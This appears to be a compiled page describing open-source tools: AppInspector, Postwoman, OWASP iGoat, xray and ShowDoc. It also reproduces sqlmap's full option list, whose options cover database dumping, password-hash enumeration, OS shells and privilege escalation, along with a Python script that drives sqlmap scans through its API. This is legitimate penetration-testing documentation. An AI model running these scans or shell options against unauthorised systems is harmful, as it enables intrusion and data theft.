Note: The user is expected to use the custom-rules-path option rather than the default ruleset because it is unlikely that any source package would contain all of the default rules. Instead, create a custom path and rule set as needed or specify a path using the custom-rules-path to point only to the rule(s) needed from the default set.
Otherwise, testing for all default rules present in source will likely yield a false or fail result in most cases.

Usage: dotnet AppInspector.dll tagtest [arguments] [options]
Arguments:
 -s, --source-path             Required. Source to test (required)
 -t, --test-type               Test to perform [rulespresent|rulesnotpresent].  Default = rulespresent
 -r, --custom-rules-path       Custom rules path 
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = true
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
 -l, --log-file-path           Log file path
 -v, --log-file-level          Log file level

Simplest use to see if a set of rules are all present in a project

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json

Basic use

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulespresent

Basic use

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulesnotpresent

ExportTags Command

Simple export of the ruleset schema for tags representing what features are supported for detection

Usage: dotnet AppInspector.dll exporttags [arguments] [options]
Arguments:
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
Export default rule tags to console
dotnet AppInspector.dll exporttags
Using output file
dotnet AppInspector.dll exporttags -o /home/user/myproject/exportags.txt
With custom rules and output file
dotnet AppInspector.dll exporttags -r /home/user/myproject/customrules -o /home/user/myproject/exportags.txt

Verify Command

Verification that ruleset is compatible and error free for import and analysis

Usage: dotnet AppInspector.dll verifyrules [arguments]
Arguments:
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium.
Simplest case to verify default rules
dotnet AppInspector.dll verifyrules
Using custom rules only
dotnet AppInspector.dll verifyrules -r /home/user/myproject/customrules -i

Build Instructions

Building from source requires .NET Core 3.0. Standard dotnet build commands can be run from the root source folder.

Framework Dependent

dotnet build -c Release

Platform Targeted Portable

dotnet publish -c Release -r win-x86
dotnet publish -c Release -r linux-x64
dotnet publish -c Release -r osx-x64

Open source and Free Alternative to Postman -> Postwoman

Postwoman – postwoman.io

Postwoman is an open source alternative to Postman. (Usually used for API request building)

Using Postwoman is basically the same as using Postman; there should be no learning curve at all if you switch from Postman to Postwoman.

Description from official GitHub page

Features ✨

❤️ Lightweight: Crafted with minimalistic UI design – simple design is the best design.

⚡️ Fast: Send requests and get/copy responses in real-time – fast software is the best software.

Methods:

  • GET – Retrieve information about the REST API resource
  • HEAD – Retrieve response headers identical to those of a GET request, but without the response body.
  • POST – Create a REST API resource
  • PUT – Update a REST API resource
  • DELETE – Delete a REST API resource or related component
  • CONNECT – Establishes a tunnel to the server identified by the target resource
  • OPTIONS – Describe the communication options for the target resource
  • TRACE – Performs a message loop-back test along the path to the target resource
  • PATCH – Apply partial modifications to a REST API resource
  • <custom> – Some APIs use custom request methods such as LIST. Type in your custom methods.

🌈 Make it yours: Customizable combinations for background, foreground and accent colors: because customization is freedom. Customize now ✨.

Customizations:

  • Choose theme: Kinda Dark (default), Clearly White, Just Black and System theme
  • Choose accent color: Green (default), Yellow, Pink, Red, Purple, Orange, Cyan and Blue
  • Toggle multi-colored headings

Customized themes are synced with local session storage

🔥 PWA: Install as a PWA on your device.

Features:

🚀 Request: Retrieve response from endpoint instantly.

  • Choose method
  • Enter URL and Path
  • Send

Features:

  • Copy/share public “Share URL”
  • Generate request code for JavaScript XHR, Fetch and cURL
  • Copy generated request code to clipboard
  • Import cURL
  • Label requests

🔌 WebSocket: Establish full-duplex communication channels over a single TCP connection.

  • Send and receive data
  • Basic and Bearer Token authentication

📡 Server Sent Events: Receive a stream of updates from a server over a HTTP connection without resorting to polling.

🔮 GraphQL: GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data.

  • Set endpoint and get schemas
  • Multi-column docs
  • Set custom request headers
  • Query schema
  • Get query response

🔐 Authentication: Allows to identify the end user.

Types:

  • None
  • Basic
  • Bearer Token
  • OAuth 2.0
  • OIDC Access Token/PKCE (Proof Key for Code Exchange)

📢 Headers: Describes the format the body of your request is being sent as.

  • Add or remove Header list

📫 Parameters: Use request parameters to set varying parts in simulated requests.

📃 Request Body: Used to send and receive data via the REST API.

Options:

  • Set Content Type
  • Add or remove Parameter list
  • Toggle between key-value and RAW input Parameter list

👋 Responses: Contains the status line, headers and the message/response body.

  • Copy response to clipboard
  • Download response to as a file
  • View preview of HTML responses

⏰ History: Request entries are synced with local session storage to reuse with a single click.

Fields:

  • Star
  • Label
  • Method
  • Status code
  • URL
  • Path
  • Timestamp
  • Duration
  • Pre-request script

History entries can be sorted by any fields

Histories can be deleted one-by-one or all together

📁 Collections: Keep your API requests organized with collections and folders. Reuse them with a single click.

Options:

  • Create infinite collections, folders and requests
  • Edit, delete, move, export, import and replace

Collections are synced with local session storage

🌐 Proxy: Enable Proxy Mode from Settings to access blocked APIs.

Features:

  • Hide your IP address
  • Fixes CORS (Cross Origin Resource Sharing) issues
  • Access APIs served in non-HTTPS (http://)
  • Use custom Proxy URL

Official Postwoman Proxy is hosted by ApolloTV – Privacy policy

📜 Pre-Request Scripts β: Snippets of code associated with a request that are executed before the request is sent.

Use-cases:

  • Include timestamp in the request headers
  • Send a random alphanumeric string in the URL parameters

Requests with Pre-Request Scripts are indicated in History entries

📄 API Documentation: Create and share dynamic API documentation easily, quickly.

Usage:

  1. Add your requests to Collections and Folders
  2. Export Collections and easily share your APIs with the rest of your team
  3. Import Collections and Generate Documentation on-the-go

⌨️ Keyboard Shortcuts: Optimized for efficiency.

Shortcuts:

  • Send Request Ctrl + G
  • Save to Collections Ctrl + S
  • Copy Request Link Ctrl + K
  • Reset Request Ctrl + L

🌎 i18n β: Experience the app in your own language.

  1. Scroll down to the footer
  2. Click “Choose Language” icon button
  3. Select your language from the menu

Keep in mind: Translations aren’t available for all source and target language combinations

To provide a localized experience for users around the world, you can add your own translations.

All i18n contributions are welcome to i18n branch only!

📦 Add-ons: Official add-ons for Postwoman.

  • Proxy β – A simple proxy server created for Postwoman
  • CLI β – A CLI solution for Postwoman
  • Browser Extensions – Browser extensions that simplify access to Postwoman: Firefox (GitHub) | Chrome (GitHub). The extensions fix CORS issues.

Add-ons are developed and maintained under Official Postwoman Organization.

☁️ Auth + Sync: Sign in and sync in real-time.

Sign in with:

  • Google
  • GitHub

Sync:

  • History
  • Collections

✅ Post-Request Tests β: Write tests associated with a request that are executed after the request response.

Use-cases:

  • Check the status code as an integer
  • Filter response headers
  • Parse the response data

To find out more, please check out Postwoman Wiki.

Resources

Postwoman Demo
Official GitHub page


Open source automatic SQL injection & database takeover tool

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap

Installation

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Usage

Get a list of basic options and switches:

python sqlmap.py -h

Get a list of all options and switches:

python sqlmap.py -hh

Official User Manual

Usage: python sqlmap.py [options]
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
  Target:
    At least one of these options has to be provided to define the
    target(s)
    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
  Request:
    These options can be used to specify how to connect to the target URL
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
  Optimization:
    These options can be used to optimize the performance of sqlmap
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
  Detection:
    These options can be used to customize the detection phase
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
  Brute force:
    These options can be used to run brute force checks
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
  User-defined function injection:
    These options can be used to create custom user-defined functions
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
  General:
    These options can be used to set some general working parameters
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing of response data
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap
  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS protection
    --list-tampers      Display list of available tamper scripts
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

More can be found here: https://github.com/sqlmapproject/sqlmap/wiki/Usage

http://sqlmap.org/

https://github.com/sqlmapproject/sqlmap/
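sqlmap also ships an API server, sqlmapapi.py, that exposes the same options over HTTP; it is how sqlmap gets driven from another tool or a scheduled job instead of a terminal. The driver below is an added example written for this page, not code from the sqlmap project. It assumes the server is listening on its default 127.0.0.1:8775, that the internal option names and the record layout of /scan/<id>/data are as described in the comments (check them against lib/core/optiondict.py and lib/core/enums.py in your checkout; DBS_TYPE = 12 in particular is an assumption), and that the target is one you are authorised to test. The SQLMAP_TARGET environment variable is this script's own switch, and FakeSqlmapApi is a constructed stand-in with invented database names so the script runs offline.

```python
"""
Drive sqlmap through its REST API server instead of the command line.

Added example, not part of sqlmap. It assumes the API server that ships in the
checkout has been started with

    python sqlmapapi.py -s      # binds 127.0.0.1:8775 unless -H/-p say otherwise

Scan options are sent as JSON using sqlmap's internal option names (url, level,
risk, batch, getDbs for --dbs, getTables for --tables, dumpTable for --dump, ...).
Results come back as records of the form {"type": <CONTENT_TYPE>, "value": ...}.
"""
import json
import os
import time
import urllib.request

API = "http://127.0.0.1:8775"
DBS_TYPE = 12   # CONTENT_TYPE.DBS in lib/core/enums.py; assumed value, check your version


def http_json(method, path, body=None):
    """One JSON round trip to the API server."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(API + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


def scan_options(url, level=1, risk=1, allow_risk3=False):
    """JSON equivalent of: sqlmap -u URL --batch --level L --risk R --random-agent --dbs.

    Risk 3 adds OR-based payloads; when the injection point sits in the WHERE
    clause of an UPDATE or DELETE those can rewrite every row, so it must be
    opted into explicitly."""
    if not 1 <= level <= 5:
        raise ValueError("level must be between 1 and 5")
    if not 1 <= risk <= 3 or (risk == 3 and not allow_risk3):
        raise ValueError("risk must be 1-2, or 3 with allow_risk3=True")
    return {"url": url, "batch": True, "level": level, "risk": risk,
            "randomAgent": True, "getDbs": True}


def run_scan(url, fetch=http_json, poll_seconds=2.0, **options):
    """Create a task, start the scan, wait for it to finish, fetch data, clean up."""
    task = fetch("GET", "/task/new")
    if not task.get("success"):
        raise RuntimeError("task creation failed: %r" % (task,))
    tid = task["taskid"]
    try:
        started = fetch("POST", "/scan/%s/start" % tid, scan_options(url, **options))
        if not started.get("success"):
            raise RuntimeError("scan did not start: %r" % (started,))
        while fetch("GET", "/scan/%s/status" % tid).get("status") != "terminated":
            time.sleep(poll_seconds)
        return fetch("GET", "/scan/%s/data" % tid)
    finally:
        fetch("GET", "/task/%s/delete" % tid)     # always release the task on the server


def databases(result):
    """Names enumerated by --dbs, pulled out of a /scan/<id>/data reply."""
    return [name for rec in result.get("data", [])
            if rec.get("type") == DBS_TYPE for name in rec.get("value", [])]


class FakeSqlmapApi(object):
    """Constructed stand-in for the server so the driver can run offline.
    Replies follow sqlmapapi's shape; the database names are invented."""

    def __init__(self):
        self.options, self.polls, self.deleted = None, 0, False

    def __call__(self, method, path, body=None):
        if path == "/task/new":
            return {"success": True, "taskid": "8f0c3a9e2b1d4c67"}
        if path.endswith("/start"):
            self.options = body
            return {"success": True, "engineid": 4242}
        if path.endswith("/status"):
            self.polls += 1
            done = self.polls >= 2                 # first poll "running", second "terminated"
            return {"success": True, "status": "terminated" if done else "running",
                    "returncode": 0 if done else None}
        if path.endswith("/data"):
            return {"success": True, "error": [],
                    "data": [{"status": 1, "type": DBS_TYPE,
                              "value": ["information_schema", "testdb"]}]}
        if path.endswith("/delete"):
            self.deleted = True
            return {"success": True}
        raise ValueError("unexpected path %s" % path)


if __name__ == "__main__":
    target = os.environ.get("SQLMAP_TARGET")       # set to an authorised URL to use a real server
    fetch = http_json if target else FakeSqlmapApi()
    result = run_scan(target or "http://testphp.example/listproducts.php?cat=1",
                      fetch=fetch, poll_seconds=2.0 if target else 0)
    print("databases:", databases(result))
```

Run it as is to exercise the driver against the stand-in, or export SQLMAP_TARGET with an authorised URL to talk to a real server. The status endpoint is polled until it reports terminated, and the task is deleted in a finally block so an aborted scan does not leave state behind on the server.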


iGoat – A Learning Tool for iOS App Pentesting and Security (Open Web Application Security Project – OWASP)

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.) and mobile app pentesters. It was inspired by the WebGoat project, and has a similar conceptual flow to it.

As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson.

The lessons are laid out in the following steps:

  1. Brief introduction to the problem.
  2. Verify the problem by exploiting it.
  3. Brief description of available remediations to the problem.
  4. Fix the problem by correcting and rebuilding the iGoat program.

Step 4 is optional, but highly recommended for all iOS developers. Assistance is available within iGoat if you don’t know how to fix a specific problem.

Vulnerabilities Covered (version 3.0):

  • Key Management
    • Hardcoded Encryption Keys
    • Key Storage Server Side
    • Random Key Generation
  • URL Scheme Attack
  • Social Engineering
  • Reverse Engineering
    • String Analysis
  • Data Protection (Rest)
    • Local Data Storage (SQLite)
    • Plist Storage
    • Keychain Usage
    • NSUserDefaults Storage
  • Data Protection (Transit)
    • Server Communication
    • Public Key Pinning
  • Authentication
    • Remote Authentication
  • Side Channel Data Leaks
    • Device Logs
    • Cut-and-Paste
    • Backgrounding
    • Keystroke Logging
  • Tampering
    • Method Swizzling
  • Injection Flaws
    • SQL Injection
    • Cross Site Scripting
  • Broken Cryptography

More on: https://github.com/owasp/igoat


Another Web Vulnerability Scanner – xray

A powerful security assessment tool

Supports Active and Passive scanning.

Supports Linux, Windows, macOS

Demo

1 Use basic crawler to scan a website

xray webscan --basic-crawler http://example.com --html-output crawler.html

2 Run as an HTTP proxy to scan passively

xray webscan --listen 127.0.0.1:7777 --html-output proxy.html

Configure the browser to use the HTTP proxy http://127.0.0.1:7777; every request that passes through the proxy is then analyzed and scanned automatically, so the scan covers exactly the pages you browse.

3 Scan a single url

xray webscan --url http://example.com/?a=b --html-output single-url.html

4 Specify the plugins to run manually

By default all built-in plugins are enabled; the following commands restrict a scan to the named plugins only.

xray webscan --plugins cmd_injection,sqldet --url http://example.com
xray webscan --plugins cmd_injection,sqldet --listen 127.0.0.1:7777 

5 Specify plugin output path

You can specify the output path of the vulnerability information:

xray webscan --url http://example.com/?a=b \
  --text-output result.txt --json-output result.json --html-output report.html

6 Proxy HTTPS traffic

6.1 Download xray binary

6.2 Generate certificate and configuration file

xray genca

6.3 Install the certificate

genca writes a CA certificate and its private key to the current directory. Import the certificate (not the key) into the trust store of the browser or system that will send traffic through the proxy; without it, HTTPS sites show certificate errors and xray cannot inspect their traffic. Keep the private key to yourself and trust the CA only in the browser profile used for testing, since anyone holding that key can forge certificates for whatever trusts it.

6.4 Configure the browser to use the proxy server 127.0.0.1:8080, then start xray listening on that address:

xray webscan --listen 127.0.0.1:8080 --html-output results.htm

Resource


Open source Online Document Management System for Developers – ShowDoc

ShowDoc is a tool for IT teams that need to share documents online; it cuts down on the back-and-forth between team members.

What can it be used for?

  • API Document (Demo)

With the rise of mobile Internet, BaaS (Backend as a Service) has become common: the server side exposes an API and the app or web frontend fetches its data through it. ShowDoc lets you write clean API documents for such interfaces quickly.

  • Data Dictionary (Demo)

A good data dictionary shows the database structure to other people, including the definition of every field.

  • Explanation Document (Demo)

ShowDoc can also hold explanatory documents for tools, and the technical specifications the team needs to look up.

What functions does it have?

  • Sharing and Exporting

The responsive page design lets project documents be read on desktop or mobile devices. A project can also be exported to a Word document for offline reading.

  • Permission Management
  • Public Project and Private Project

Projects on ShowDoc are divided into two categories, Public and Private. A Public Project can be visited by any user, logged in or not, while a Private Project asks for a password before it can be viewed. The password is set by the project creator, so everyone who needs to read a private project shares that one secret.

  • Project Transfer

The project creator can transfer the project to any other user of the site.

  • Project Members

Members can be added to or removed from a project easily. Members can edit the project but cannot transfer or delete it; only the project creator has those permissions.

  • Edit Function
    • Markdown Edit
    ShowDoc uses a Markdown editor, which gives a good editing and reading experience. If you are new to Markdown, look up an introduction to Markdown syntax first.
    • Template Insert
    On the editing page, a button at the top of the editor inserts an API interface template or a data dictionary template. After inserting a template only the data needs to be filled in, which saves a lot of editing work.
    • History Version
    ShowDoc keeps a version history for each page, so a page can be restored to an earlier version.

Resource

https://github.com/star7th/showdoc